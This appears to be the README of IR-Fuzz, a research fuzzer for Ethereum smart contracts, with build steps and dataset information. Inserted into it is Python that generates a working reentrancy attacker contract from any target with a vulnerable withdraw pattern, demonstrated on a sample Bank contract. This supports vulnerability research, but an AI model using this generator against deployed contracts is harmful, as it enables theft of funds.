Messi-Q/IR-Fuzz

IR-Fuzz

Rethinking Smart Contract Fuzzing: Fuzzing With Invocation Ordering and Important Branch Revisiting.

Requirements

IR-Fuzz runs on Linux (Ubuntu 18.04 recommended).

Dependencies:

Architecture

$(IR-Fuzz)
├── sFuzz
│   ├── fuzzer
│   ├── libfuzzer
│   ├── liboracle
│   └── ...
├── bran
│   └── ...
├── tools
│   ├── requirements.txt
│   └── ...
├── assets
│   ├── ReentrancyAttacker_model.sol
│   ├── ReentrancyAttacker.sol
│   └── ...
├── source_code
│   └── ...
├── contracts
│   └── ...
├── branch_msg
│   └── ...
├── logs
│   └── ...
├── fuzz
├── initial_.sh
├── rename_src.sh
├── run.sh
└── README.md
  • sFuzz: The core fuzzing module of IR-Fuzz
  • bran: The abstract interpreter used for path analysis
  • tools: The static analysis tools for extracting vulnerability-specific patterns
    • requirements.txt: Required Python dependencies
  • assets:
    • ReentrancyAttacker_model.sol: The template for constructing an attacker contract
    • ReentrancyAttacker.sol: The attacker contract generated from the template
  • source_code: Stores the source code (.sol) of the contract under test
  • contracts/example1: Stores the compiled results of the contract under test
  • branch_msg: Stores the intermediate representations of the contract under test
  • logs: Stores the execution report produced during fuzzing
  • fuzz: The compiled fuzzer executable (to rebuild it, follow the Complete Execution steps below)
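As an added illustration of how an attacker contract can be instantiated from a template such as assets/ReentrancyAttacker_model.sol, the Python below scans the contract under test for a payable entry point and for a function that forwards Ether to msg.sender through a gas-forwarding low-level call, then fills a template with the target's name and ABI signatures. This is not IR-Fuzz's own generator: the page does not show the real template, so the template text, its {{...}} placeholder syntax, the Bank target contract and all helper names are constructed for this example. The sink check deliberately ignores transfer() and send(), which only forward the 2300-gas stipend, so a fallback cannot re-enter through them.

```python
"""Instantiate a reentrancy attacker contract from a template (added illustration).
IR-Fuzz's real template assets/ReentrancyAttacker_model.sol is not shown on the page:
the template text, {{...}} placeholders, Bank target and helpers here are constructed."""
import re

ATTACKER_TEMPLATE = """\
pragma solidity ^0.4.24;
// Attacker generated for target contract {{TARGET}} (constructed template).
contract ReentrancyAttacker {
    address public target;
    uint256 public depth;                       // re-entries performed so far
    uint256 constant MAX_DEPTH = {{MAX_DEPTH}};

    constructor(address _target) public { target = _target; }

    // Fund the target, then call the function that sends Ether back to us.
    function attack() public payable {
        require(target.call.value(msg.value)(abi.encodeWithSignature("{{DEPOSIT_SIG}}")));
        require(target.call({{WITHDRAW_CALL}}));
    }

    // Runs inside the target's Ether transfer, before it updates its state.
    function () external payable {
        if (depth < MAX_DEPTH) {
            depth++;
            target.call({{WITHDRAW_CALL}});
        }
    }
}
"""

# Constructed vulnerable target: Ether is sent before the balance is updated.
SAMPLE_TARGET = """\
pragma solidity ^0.4.24;
contract Bank {
    mapping(address => uint256) public balances;
    function deposit() public payable { balances[msg.sender] += msg.value; }
    function withdraw(uint256 amount) public {
        require(balances[msg.sender] >= amount);
        require(msg.sender.call.value(amount)());
        balances[msg.sender] -= amount;
    }
}
"""

FUNC_RE = re.compile(r"\bfunction\s+(\w+)\s*\(([^)]*)\)([^{;]*)")
# Gas-forwarding low-level call to msg.sender: 0.4 ".call.value(x)" or 0.6+ ".call{value: x}".
SINK_RE = re.compile(r"msg\.sender\.call(\.value\(|\{)")

def _body_after(source, pos):
    """Brace-delimited body following pos, or '' for a bodiless (interface) declaration."""
    start = source.find("{", pos)
    if start < 0 or ";" in source[pos:start]:
        return ""
    depth = 0
    for i in range(start, len(source)):
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        if depth == 0:
            return source[start:i + 1]
    return ""

def parse_functions(source):
    """Functions of a Solidity source with canonical ABI signature, modifiers and body."""
    funcs = []
    for m in FUNC_RE.finditer(source):
        name, params, mods = m.groups()
        # 'uint amount' -> 'uint256'; data location and parameter name are dropped.
        types = [re.sub(r"\b(u?int)\b", r"\g<1>256", p.split()[0]) for p in params.split(",") if p.strip()]
        funcs.append({"name": name, "types": types, "signature": "%s(%s)" % (name, ",".join(types)),
                      "modifiers": mods.split(), "body": _body_after(source, m.end())})
    return funcs

def has_reentrancy_sink(source):
    return any(SINK_RE.search(f["body"]) for f in parse_functions(source))

def choose_entry_points(source):
    """A payable function to fund the target, and the function containing the sink."""
    funcs = parse_functions(source)
    deposit = next((f for f in funcs if "payable" in f["modifiers"]), None)
    withdraw = next((f for f in funcs if SINK_RE.search(f["body"])), None)
    if deposit is None or withdraw is None:
        raise ValueError("target lacks a payable entry point or a msg.sender call sink")
    return deposit, withdraw

def render_attacker(target_source, max_depth=3, amount="1 ether"):
    """Fill the template for target_source and return the attacker contract text."""
    deposit, withdraw = choose_entry_points(target_source)
    args = []
    for typ in withdraw["types"]:           # pick a literal per parameter type
        if typ.startswith(("uint", "int")):
            args.append(amount)
        elif typ == "address":
            args.append("address(this)")
        else:
            raise ValueError("no default argument for parameter type " + typ)
    call = 'abi.encodeWithSignature("%s"%s)' % (withdraw["signature"], "".join(", " + a for a in args))
    fills = {"TARGET": re.search(r"\bcontract\s+(\w+)", target_source).group(1),
             "DEPOSIT_SIG": deposit["signature"], "WITHDRAW_CALL": call, "MAX_DEPTH": str(max_depth)}
    out = ATTACKER_TEMPLATE
    for key, value in fills.items():
        out = out.replace("{{" + key + "}}", value)
    if "{{" in out:
        raise ValueError("unfilled placeholder left in template")
    return out
```

Calling render_attacker(SAMPLE_TARGET) yields a ReentrancyAttacker whose attack() deposits 1 ether via deposit() and then calls withdraw(uint256); the fallback re-enters withdraw up to MAX_DEPTH times while Bank's balance entry is still unchanged. The regex-based parser is enough for single-file targets like this one; a real generator would work from the compiler's ABI output instead.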

Quick Start

Path analysis

cd ./bran/
go build -v -o ../analyse_prefix

Rename contract under test

cd ..
cd ./tools/
python3 rename_contracts.py

Execute the fuzzer

cd ..
./run.sh

Complete Execution

  • Initialize the environment and install system dependencies (this step takes a long time)
./initial_.sh
  • Create the workspace for the contract placed in directory source_code
./rename_src.sh
  • Run IR-Fuzz and perform vulnerability detection
./run.sh

Note

  • The code is adapted from sFuzz (a state-of-the-art fuzzer for smart contracts) and bran (a static analysis framework for EVM bytecode).

  • If you use Boost 1.70.0 or newer, ".get_io_service()" (in sFuzz/libp2p/RLPxHandshake.h) must be replaced with ".get_executor()", because Boost.Asio removed get_io_service() in 1.70. This change has already been applied in this project.

  • For any questions, please email messi.qp711@gmail.com.

Dataset

We release the benchmark dataset collected from Etherscan, which contains over 12K Ethereum smart contracts and covers eight types of vulnerabilities. More details and usage instructions can be found on our dataset page, Smart-Contract-Dataset, which is continuously being improved.

About

Rethinking Smart Contract Fuzzing: Fuzzing With Invocation Ordering and Important Branch Revisiting (TIFS Accepted).
